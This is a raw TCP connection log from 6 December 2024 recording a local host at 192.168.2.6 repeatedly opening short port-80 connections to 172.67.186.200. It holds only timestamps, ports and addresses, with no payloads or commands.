Dec 6, 2024 03:14:56.273828030 CET	50111	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:56.277611971 CET	50111	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:56.397399902 CET	80	50111	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:56.625611067 CET	50111	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:56.745558023 CET	80	50111	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:57.388420105 CET	80	50111	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:57.435929060 CET	50111	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:57.627269983 CET	80	50111	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:57.670293093 CET	50111	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:57.747458935 CET	50111	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:57.748343945 CET	50112	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:57.867743969 CET	80	50111	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:57.867796898 CET	50111	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:57.867990971 CET	80	50112	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:57.868048906 CET	50112	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:57.868259907 CET	50112	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:57.987898111 CET	80	50112	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:58.217608929 CET	50112	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:58.337513924 CET	80	50112	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:58.965641022 CET	80	50112	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.014029980 CET	50112	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.217875004 CET	80	50112	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.264041901 CET	50112	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.342647076 CET	50112	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.343599081 CET	50113	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.375149012 CET	50114	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.462688923 CET	80	50112	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.462743044 CET	50112	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.463305950 CET	80	50113	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.463359118 CET	50113	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.494925022 CET	80	50114	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.494986057 CET	50114	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.495119095 CET	50114	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.498605967 CET	50110	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.501214027 CET	50115	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.614833117 CET	80	50114	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.620933056 CET	80	50115	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.620996952 CET	50115	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.621184111 CET	50115	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.740859032 CET	80	50115	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.842248917 CET	50114	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:59.962093115 CET	80	50114	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.962119102 CET	80	50114	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:59.967325926 CET	50115	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:00.087183952 CET	80	50115	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:00.642795086 CET	80	50114	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:00.685914993 CET	50114	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:00.751444101 CET	80	50115	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:00.795404911 CET	50115	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:00.946414948 CET	80	50114	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:00.998403072 CET	50114	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.008456945 CET	80	50115	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:01.060913086 CET	50115	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.134635925 CET	50114	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.134695053 CET	50115	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.135401964 CET	50117	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.254770041 CET	80	50114	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:01.254838943 CET	50114	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.255173922 CET	80	50117	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:01.255253077 CET	50117	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.255266905 CET	80	50115	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:01.255320072 CET	50115	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.255446911 CET	50117	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.375154018 CET	80	50117	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:01.607878923 CET	50117	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:01.727792978 CET	80	50117	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:02.360794067 CET	80	50117	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:02.407839060 CET	50117	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:02.655102968 CET	80	50117	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:02.701527119 CET	50117	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:02.776894093 CET	50117	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:02.779603958 CET	50118	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:02.897185087 CET	80	50117	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:02.897259951 CET	50117	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:02.899400949 CET	80	50118	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:02.899486065 CET	50118	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:02.899712086 CET	50118	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:03.019485950 CET	80	50118	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:03.251220942 CET	50118	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:03.370987892 CET	80	50118	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:03.984781027 CET	80	50118	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:04.029679060 CET	50118	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:04.241156101 CET	80	50118	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:04.295275927 CET	50118	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:04.353089094 CET	50118	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:04.353091955 CET	50119	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:04.472965002 CET	80	50119	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:04.473062038 CET	50119	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:04.473221064 CET	50119	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:04.473244905 CET	80	50118	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:04.473345041 CET	50118	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:04.592988968 CET	80	50119	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:04.828944921 CET	50119	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:04.948844910 CET	80	50119	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:05.558562994 CET	80	50119	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:05.607769966 CET	50119	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:05.836740971 CET	80	50119	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:05.889054060 CET	50119	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:05.952811003 CET	50119	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:05.953294039 CET	50120	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:05.969887972 CET	50121	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:06.073038101 CET	80	50119	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:06.073105097 CET	80	50120	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:06.075720072 CET	50119	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:06.075722933 CET	50120	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:06.089792967 CET	80	50121	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:06.092092991 CET	50121	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:06.092092991 CET	50121	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:06.212042093 CET	80	50121	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:06.436270952 CET	50121	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:06.556332111 CET	80	50121	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:07.186650991 CET	80	50121	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:07.232760906 CET	50121	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:07.467648983 CET	80	50121	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:07.514038086 CET	50121	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:07.588629961 CET	50121	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:07.589603901 CET	50122	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:07.708798885 CET	80	50121	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:07.708872080 CET	50121	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:07.709408998 CET	80	50122	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:07.709508896 CET	50122	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:07.709692001 CET	50122	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:07.829914093 CET	80	50122	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:08.061248064 CET	50122	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:08.181133032 CET	80	50122	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:08.796869040 CET	80	50122	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:08.842243910 CET	50122	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:09.031224012 CET	80	50122	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:09.076514006 CET	50122	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:09.156235933 CET	50123	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:09.276211023 CET	80	50123	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:09.276295900 CET	50123	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:09.276524067 CET	50123	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:09.396771908 CET	80	50123	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:09.623775959 CET	50123	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:09.743746042 CET	80	50123	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:10.374085903 CET	80	50123	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:10.423600912 CET	50123	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.653619051 CET	80	50123	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:10.701567888 CET	50123	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.776648045 CET	50122	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.776648998 CET	50123	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.780014038 CET	50124	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.896838903 CET	80	50123	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:10.897031069 CET	50123	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.899756908 CET	80	50124	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:10.899997950 CET	50124	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.900147915 CET	50124	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.983680010 CET	50124	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:10.987620115 CET	50125	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:11.019824028 CET	80	50124	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.107283115 CET	50126	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:11.108572006 CET	80	50125	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.108643055 CET	50125	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:11.108817101 CET	50125	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:11.146946907 CET	80	50124	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.227210045 CET	80	50126	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.227276087 CET	50126	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:11.227443933 CET	50126	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:11.228513956 CET	80	50125	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.347269058 CET	80	50126	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.467245102 CET	50125	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:11.577157974 CET	50126	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:11.588274002 CET	80	50125	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.589277029 CET	80	50125	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.697010994 CET	80	50126	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.808022976 CET	80	50124	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:11.808077097 CET	50124	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.205543041 CET	80	50125	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:12.248385906 CET	50125	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.352935076 CET	80	50126	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:12.407654047 CET	50126	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.519922972 CET	80	50125	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:12.560944080 CET	50125	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.668808937 CET	80	50126	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:12.719600916 CET	50126	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.791636944 CET	50126	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.791636944 CET	50125	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.795686960 CET	50127	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.911951065 CET	80	50126	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:12.912329912 CET	80	50125	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:12.912466049 CET	50126	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.912467957 CET	50125	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.915446997 CET	80	50127	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:12.915963888 CET	50127	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:12.915963888 CET	50127	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:13.035733938 CET	80	50127	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:13.264187098 CET	50127	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:13.384056091 CET	80	50127	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:14.000737906 CET	80	50127	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:14.047746897 CET	50127	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:14.257925034 CET	80	50127	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:14.311702013 CET	50127	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:14.386044979 CET	50128	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:14.505943060 CET	80	50128	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:14.507793903 CET	50128	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:14.507793903 CET	50128	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:14.627624989 CET	80	50128	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:14.857949972 CET	50128	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:14.977906942 CET	80	50128	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:15.625665903 CET	80	50128	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:15.670243025 CET	50128	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:15.875469923 CET	80	50128	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:15.920252085 CET	50128	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:16.021955013 CET	50127	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:16.021958113 CET	50128	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:16.087610960 CET	50129	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:16.142122984 CET	80	50128	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:16.144506931 CET	50128	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:16.207446098 CET	80	50129	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:16.209894896 CET	50129	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:16.209894896 CET	50129	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:16.329755068 CET	80	50129	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:16.563599110 CET	50129	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:16.683464050 CET	80	50129	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:17.295835972 CET	80	50129	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:17.342128038 CET	50129	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.530992031 CET	50129	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.531177998 CET	80	50129	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:17.531258106 CET	50129	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.531817913 CET	50130	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.651602030 CET	80	50130	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:17.651824951 CET	50130	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.652534962 CET	50130	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.652539015 CET	50131	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.772309065 CET	80	50130	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:17.772382021 CET	80	50131	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:17.772488117 CET	50131	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.774772882 CET	50131	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:17.894865036 CET	80	50131	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:17.998454094 CET	50130	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:18.118541002 CET	80	50130	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:18.118578911 CET	80	50130	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:18.123536110 CET	50131	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:18.243423939 CET	80	50131	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:18.739722967 CET	80	50130	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:18.795260906 CET	50130	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:18.858072996 CET	80	50131	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:18.904654980 CET	50131	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:18.997639894 CET	80	50130	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:19.045254946 CET	50130	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.127294064 CET	80	50131	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:19.170254946 CET	50131	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.249964952 CET	50130	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.250212908 CET	50131	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.250983953 CET	50132	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.371695042 CET	80	50130	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:19.371754885 CET	50130	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.371961117 CET	80	50131	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:19.372004032 CET	50131	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.372293949 CET	80	50132	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:19.372359037 CET	50132	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.372560024 CET	50132	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.492232084 CET	80	50132	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:19.717365026 CET	50132	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:19.837412119 CET	80	50132	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:20.470738888 CET	80	50132	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:20.515728951 CET	50132	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:20.750746965 CET	80	50132	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:20.755702019 CET	50132	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:20.871593952 CET	50133	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:20.876565933 CET	80	50132	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:20.880455017 CET	50132	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:20.991516113 CET	80	50133	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:20.991853952 CET	50133	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:20.991853952 CET	50133	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:21.112008095 CET	80	50133	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:21.342262030 CET	50133	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:21.463001013 CET	80	50133	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:22.084883928 CET	80	50133	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:22.140279055 CET	50133	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:22.348702908 CET	80	50133	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:22.405391932 CET	50133	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:22.464534998 CET	50133	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:22.465553999 CET	50134	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:22.584750891 CET	80	50133	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:22.585247993 CET	80	50134	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:22.585656881 CET	50133	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:22.585776091 CET	50134	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:22.589565992 CET	50134	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:22.709460020 CET	80	50134	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:22.937560081 CET	50134	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:23.057499886 CET	80	50134	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:23.695394993 CET	80	50134	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:23.748379946 CET	50134	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:23.930843115 CET	80	50134	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:23.982755899 CET	50134	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.014477015 CET	50134	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.015238047 CET	50135	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.057550907 CET	50136	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.134840965 CET	80	50134	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:24.134957075 CET	80	50135	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:24.137646914 CET	50134	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.137646914 CET	50135	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.177567959 CET	80	50136	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:24.177777052 CET	50136	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.177777052 CET	50136	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.297661066 CET	80	50136	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:24.529716015 CET	50136	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:24.649696112 CET	80	50136	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:25.272584915 CET	80	50136	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:25.326492071 CET	50136	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:25.543132067 CET	80	50136	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:25.593595982 CET	50136	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:25.667761087 CET	50136	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:25.668787956 CET	50137	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:25.787931919 CET	80	50136	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:25.788029909 CET	50136	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:25.788496971 CET	80	50137	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:25.788568974 CET	50137	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:25.788784981 CET	50137	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:25.908549070 CET	80	50137	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:26.139050007 CET	50137	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:26.262300968 CET	80	50137	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:26.957426071 CET	80	50137	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:26.998748064 CET	50137	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:27.190922976 CET	80	50137	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:27.232731104 CET	50137	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:27.310798883 CET	50137	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:27.312195063 CET	50138	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:27.430804968 CET	80	50137	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:27.430871010 CET	50137	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:27.431936026 CET	80	50138	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:27.432008982 CET	50138	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:27.432301044 CET	50138	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:27.552104950 CET	80	50138	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:27.780832052 CET	50138	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:27.900763035 CET	80	50138	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:28.516891003 CET	80	50138	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:28.560848951 CET	50138	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:28.750566006 CET	80	50138	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:28.797535896 CET	50138	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:28.876118898 CET	50138	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:28.877538919 CET	50139	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:28.996464014 CET	80	50138	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:28.996567011 CET	50138	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:28.997332096 CET	80	50139	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:28.997426987 CET	50139	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:28.997625113 CET	50139	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.062305927 CET	50139	80	192.168.2.6	172.67.186.200
